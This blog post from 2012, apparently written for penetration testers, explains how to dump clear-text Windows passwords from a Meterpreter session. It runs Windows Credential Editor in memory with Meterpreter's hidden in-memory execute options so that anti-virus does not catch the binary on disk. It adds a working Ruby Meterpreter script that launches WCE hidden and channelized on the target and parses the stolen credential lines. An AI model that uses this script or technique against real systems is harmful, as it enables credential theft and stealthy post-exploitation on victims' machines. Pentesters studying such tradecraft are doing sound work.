Archive for July, 2012

If you haven’t heard, there’s a tool, released a little over a year ago now with little fanfare, that can dump the credentials of every logged-on user in clear text. It’s called mimikatz. Passing the hash is fun, but you can’t beat a good clear-text password. Am I right? You can download the executable and its dependent DLL from Benjamin’s (the author’s) site, along with a detailed explanation of how it works in his presentation from PHDays 2012. I figured I would finally check this tool out and see what it has to offer.

A little Googling around and I found a post on PaulDotCom detailing how to upload and execute the tool through a Meterpreter session. One problem with this method is that the binary can be stopped by anti-virus as soon as it hits the disk. Mubix is currently working on a solution to implement the functionality of mimikatz directly into the Metasploit Framework, an addition I think everyone looks forward to.

In the meantime, there is another way to dump clear-text passwords within a Meterpreter session without the tool ever touching the disk. First, Hernan Ochoa from Amplia Security has updated his tool, Windows Credential Editor (WCE), to also dump clear-text passwords. That version is currently in beta and hasn’t been added to the BackTrack repository yet, so we’ll have to download it from Amplia Security’s site directly. Next, all we need to do is use Meterpreter’s “execute” command with its execute-from-memory option, which reads the executable from our own machine, injects it into the memory of a process on the remote host, and runs it there to dump the passwords for us. Egyp7, one of the Metasploit Framework developers, wrote a post a couple of months ago showing just how to do this. Let’s look at our Meterpreter “execute” options:

meterpreter > execute
Usage: execute -f file [options]
Executes a command on the remote machine.
OPTIONS:
-H Create the process hidden from view.
-a <opt> The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d <opt> The 'dummy' executable to launch when using -m.
-f <opt> The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-k Execute process on the meterpreters current desktop
-m Execute from memory.
-s <opt> Execute process in a given session as the session user
-t Execute process with currently impersonated thread token

We’re simply going to use “-H” to create a hidden process, “-m” to execute the process from memory (note that with “-m” the path given to “-f” is on our attacking machine, not the target, and “-d” names the dummy process on the target that gets launched and then replaced with our executable), and “-a” to pass WCE the arguments it needs to dump the clear-text passwords (“-w”) and write them to a file (“-o”). One caveat: the executable itself never touches the disk, but the output file does, so download it and delete it from the target when you’re done, or run the process channelized (“-c” with “-i”) so WCE’s output comes back over the session instead of being written to a file.
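The same procedure scripted against the Rex API, so it can be run with “run /root/wce_inmem.rb” from a session instead of typed at the prompt. This is an added example, not code from the original post, from Egyp7’s post or from Metasploit itself. It swaps the file output for a channelized process (the API equivalent of “-c”) and reads WCE’s output back over the session, so nothing is written to the target’s disk. The WCE path, the dummy process name and the assumed “DOMAIN\user:password” output format are assumptions for the example.

```ruby
# Added example (not from the original post or Metasploit): a Meterpreter
# script that drives "execute -H -m -c" through the Rex API, streaming WCE's
# clear-text output over a channel instead of writing it to a file on the target.
# Run from a live session with:  meterpreter > run /root/wce_inmem.rb

WCE_LOCAL = '/root/wce/wce.exe'  # assumed path on the ATTACKER box; -m reads it locally
DUMMY_EXE = 'calc.exe'           # assumed benign host process that -m launches and replaces

# Option hash the console builds from -H / -m / -c:
#   'Hidden'      -> -H, no window on the target
#   'Channelized' -> -c, stdout/stderr come back over a Meterpreter channel
#   'InMemory'    -> -m, value is the dummy (-d) executable; the path passed to
#                    execute() is then read from the attacker's filesystem
def wce_exec_opts(dummy = DUMMY_EXE)
  { 'Hidden' => true, 'Channelized' => true, 'InMemory' => dummy }
end

# Arguments for WCE itself: -w dumps clear-text passwords (the beta feature).
# No -o here, since the output is collected over the channel rather than a file.
def wce_args
  '-w'
end

# Drain a channelized process until it exits and return everything it printed.
def read_all(process)
  out = String.new
  while (chunk = process.channel.read)
    out << chunk
  end
  process.channel.close
  process.close
  out
end

# Keep only credential lines, dropping WCE's banner and blank lines.
# Assumed output format for the example: one "DOMAIN\user:password" per line.
def credential_lines(output)
  output.lines.map(&:strip).select do |line|
    line.include?('\\') && line.include?(':') && !line.start_with?('WCE')
  end
end

# Launch WCE in memory on the target and return the parsed credential lines.
def dump_cleartext(session)
  process = session.sys.process.execute(WCE_LOCAL, wce_args, wce_exec_opts)
  credential_lines(read_all(process))
end

# Entry point when loaded as a Meterpreter script; `client` is the session object.
if defined?(client) && client
  dump_cleartext(client).each { |line| print_status(line) }
end
```

Because “InMemory” is set, execute() ships the bytes of WCE_LOCAL over the session and loads them into the dummy process, so the only artefact on the target is the hollowed-out process itself; anti-virus that scans memory or hooks process creation can still catch it, and nothing here avoids that.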